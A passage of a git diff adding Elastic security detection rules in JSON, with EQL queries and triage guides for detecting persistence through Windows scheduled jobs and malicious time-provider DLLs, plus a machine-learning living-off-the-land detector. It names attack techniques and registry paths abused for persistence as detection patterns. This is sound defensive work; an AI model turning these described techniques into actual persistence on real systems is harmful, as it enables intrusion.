Files\\\\CCleaner\\\\CCleaner64.exe\" and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\CCleanerCrashReporting.job\"\n ) or\n (\n process.executable : (\n \"?:\\\\Program Files (x86)\\\\ManageEngine\\\\UEMS_Agent\\\\bin\\\\dcagentregister.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcagentregister.exe\"\n ) and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\DCAgentUpdater.job\"\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "1327384f-00f3-44d5-9a8c-2373ba071e92_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_108.json b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_108.json new file mode 100644 index 00000000000..3bfe7dfb33a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_108.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A job can be used to schedule programs or scripts to be executed at a specified date and time. Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.", + "false_positives": [ + "Legitimate scheduled jobs may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Scheduled Job Creation", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\*\" and file.extension : \"job\" and\n not (\n (\n process.executable : \"?:\\\\Program Files\\\\CCleaner\\\\CCleaner64.exe\" and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\CCleanerCrashReporting.job\"\n ) or\n (\n process.executable : (\n \"?:\\\\Program Files (x86)\\\\ManageEngine\\\\UEMS_Agent\\\\bin\\\\dcagentregister.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcagentregister.exe\"\n ) and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\DCAgentUpdater.job\"\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "1327384f-00f3-44d5-9a8c-2373ba071e92_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_3.json b/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_3.json new file mode 100644 index 00000000000..bea7e177518 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_3.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious.", + "from": "now-10m", + "index": [ + "endgame-*", + "logs-endpoint.events.process-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Machine Learning Detected a Suspicious Windows Event Predicted to be Malicious Activity", + "query": "process where (problemchild.prediction == 1 or blocklist_label == 1) and not process.args : (\"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.txt*\", \"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.tmp*\")\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "blocklist_label", + "type": "unknown" + }, + { + "ecs": false, + "name": "problemchild.prediction", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "13e908b9-7bf0-4235-abc9-b5deb500d0ad", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n", + "severity": "low", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.004", + "name": "Masquerade Task or Service", + "reference": "https://attack.mitre.org/techniques/T1036/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "13e908b9-7bf0-4235-abc9-b5deb500d0ad_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_4.json b/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_4.json new file mode 100644 index 00000000000..60370c3e32d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_4.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious.", + "from": "now-10m", + "index": [ + "endgame-*", + "logs-endpoint.events.process-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Machine Learning Detected a Suspicious Windows Event Predicted to be Malicious Activity", + "query": "process where (problemchild.prediction == 1 or blocklist_label == 1) and not process.args : (\"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.txt*\", \"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.tmp*\")\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "blocklist_label", + "type": "unknown" + }, + { + "ecs": false, + "name": "problemchild.prediction", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "13e908b9-7bf0-4235-abc9-b5deb500d0ad", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n", + "severity": "low", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.004", + "name": "Masquerade Task or Service", + "reference": "https://attack.mitre.org/techniques/T1036/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "13e908b9-7bf0-4235-abc9-b5deb500d0ad_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_108.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_108.json new file mode 100644 index 00000000000..904c0d233e2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_108.json @@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Persistence via Time Provider Modification", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence via Time Provider Modification\n\nThe Time Provider architecture in Windows is responsible for obtaining accurate timestamps from network devices or clients. It is implemented as a DLL file in the System32 folder and is initiated by the W32Time service during Windows startup. Adversaries may exploit this by registering and enabling a malicious DLL as a time provider to establish persistence. \n\nThis rule identifies changes in the registry paths associated with Time Providers, specifically targeting the addition of new DLL files.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine whether the DLL is signed.\n- Retrieve the DLL and determine if it is malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore Time Provider settings to the desired state.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type:\"change\" and\n registry.path: (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\W32Time\\\\TimeProviders\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\W32Time\\\\TimeProviders\\\\*\"\n ) and\n registry.data.strings:\"*.dll\" and\n not\n (\n process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and\n registry.data.strings : \"?:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmwTimeProvider\\\\vmwTimeProvider.dll\"\n )\n", + "references": [ + "https://pentestlab.blog/2019/10/22/persistence-time-providers/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.003", + "name": "Time Providers", + "reference": "https://attack.mitre.org/techniques/T1547/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.003", + "name": "Time Providers", + "reference": "https://attack.mitre.org/techniques/T1547/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_109.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_109.json new file mode 100644 index 00000000000..4e6ed8f7ad4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_109.json @@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Persistence via Time Provider Modification", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence via Time Provider Modification\n\nThe Time Provider architecture in Windows is responsible for obtaining accurate timestamps from network devices or clients. It is implemented as a DLL file in the System32 folder and is initiated by the W32Time service during Windows startup. Adversaries may exploit this by registering and enabling a malicious DLL as a time provider to establish persistence. \n\nThis rule identifies changes in the registry paths associated with Time Providers, specifically targeting the addition of new DLL files.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine whether the DLL is signed.\n- Retrieve the DLL and determine if it is malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore Time Provider settings to the desired state.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type:\"change\" and\n registry.path: (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\W32Time\\\\TimeProviders\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\W32Time\\\\TimeProviders\\\\*\"\n ) and\n registry.data.strings:\"*.dll\" and\n not\n (\n process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and\n registry.data.strings : \"?:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmwTimeProvider\\\\vmwTimeProvider.dll\"\n )\n", + "references": [ + "https://pentestlab.blog/2019/10/22/persistence-time-providers/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.003", + "name": "Time Providers", + "reference": "https://attack.mitre.org/techniques/T1547/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.003", + "name": "Time Providers", + "reference": "https://attack.mitre.org/techniques/T1547/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_109", + "type": "security-rule" +} \ No newline at end of file diff --git 